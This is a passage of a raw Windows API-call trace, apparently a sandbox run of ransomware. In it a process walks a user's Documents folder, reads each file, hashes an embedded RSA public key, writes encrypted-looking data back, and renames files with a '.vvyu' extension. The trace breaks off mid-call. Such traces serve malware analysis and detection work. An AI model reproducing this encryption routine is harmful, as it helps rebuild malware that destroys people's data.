HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.389] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x7f44, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x7f44, lpOverlapped=0x0) returned 1 [0192.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.390] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7f49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.390] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0192.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0192.392] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.392] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.392] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.393] CloseHandle (hObject=0x584) returned 1 [0192.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0192.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0192.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.394] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\f4quftb6AeNpM.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\f4quftb6aenpm.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\f4quftb6AeNpM.csv.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\f4quftb6aenpm.csv.vvyu")) returned 1 [0192.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.398] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0192.400] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16709c90, ftCreationTime.dwHighDateTime=0x1d89889, ftLastAccessTime.dwLowDateTime=0x6be64490, ftLastAccessTime.dwHighDateTime=0x1d8a261, ftLastWriteTime.dwLowDateTime=0x6be64490, ftLastWriteTime.dwHighDateTime=0x1d8a261, nFileSizeHigh=0x0, nFileSizeLow=0xe290, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JS80beEINGqUQ8qtRx7a.xls", cAlternateFileName="JS80BE~1.XLS")) returned 1 [0192.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0192.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0192.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0192.401] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\JS80beEINGqUQ8qtRx7a.xls") returned=".xls" [0192.401] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\rQz y4W0rYbhQ_iRzD3\\JS80beEINGqUQ8qtRx7a.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\rqz y4w0rybhq_irzd3\\js80beeingquq8qtrx7a.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.401] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=58000) returned 1 [0192.401] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.404] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe26a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.404] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.406] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.406] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe290, lpOverlapped=0x0) returned 1 [0192.407] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.407] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.407] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.407] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.409] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.409] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.409] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.409] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.409] GetLastError () returned 0x0 [0192.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.409] GetLastError () returned 0x0 [0192.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.409] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.409] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.410] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.410] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0192.410] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe290) returned 0x2d45778 [0192.410] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41ad0 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41b18 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d48 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.411] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d48 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39d30 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0192.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.414] GetCurrentThreadId () returned 0x264 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45170 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.415] GetCurrentThreadId () returned 0x264 [0192.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d90 [0192.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d30 [0192.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d48 [0192.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0192.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39da8 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d78 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d60 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39dc0 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d60 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d60 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d78 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0192.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d30 [0192.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d90 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dc0 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.419] HeapFree (in: 